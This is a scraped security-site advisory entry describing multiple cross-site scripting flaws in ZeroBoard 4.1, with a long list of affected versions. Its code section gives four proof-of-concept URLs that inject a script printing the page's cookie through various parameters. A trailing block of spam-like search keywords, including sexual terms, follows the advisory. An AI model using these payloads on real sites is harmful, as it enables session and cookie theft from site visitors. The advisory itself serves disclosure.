exploits , vulnerabilities , articles , ZeroBoard Multiple Cross-Site Scripting Vulnerabilities
| Title |
ZeroBoard Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2005-02-19-12:00AM |
| Updated |
2005-02-19-06:38PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to albanian haxorz <asc@albanianhaxorz.org>. |
| Vulnerable |
Zeroboard Zeroboard 4.1 pl6
Zeroboard Zeroboard 4.1 pl5
Zeroboard Zeroboard 4.1 pl4
Zeroboard Zeroboard 4.1 pl3
Zeroboard Zeroboard 4.1 pl2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 IA32
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0 i386
|
| Not Vulnerable |
|
| Code |
An exploit is not required.
The following proof of concept examples are available: http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E% 3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/zboard.php? id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
http://www.example.com/skin/dir/view_image.php? filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
http://www.example.com/zboard.php?id=link&page=ALBANIAN% 20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 07:07:47 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
preityzint news for c black pus Vidio smp erotica DESISEXSCA Powered By WWW.SEX6.C book.uugo. winroute 5 www.c3d4.n \r\n26f5\r www.yiyuan erotica Crack hip how to off r kelly se news for c phpRaid v3 \r\n26f5\r bigcock me commic Shakeela+s mollika south indi www.c499.c www.988.mo www.palace www. sexg geourdunew Server v5. Suvarna scary maze Crack Data %252525252 bind 9.3 Telephone www.a383-s sex wvws m...sta.or soulja boy www.aoseed Www.zporns xp sp2 cra Wordsex+vi %252Fcompo PHP+Advanc all cartoo Smp kembal www indian
|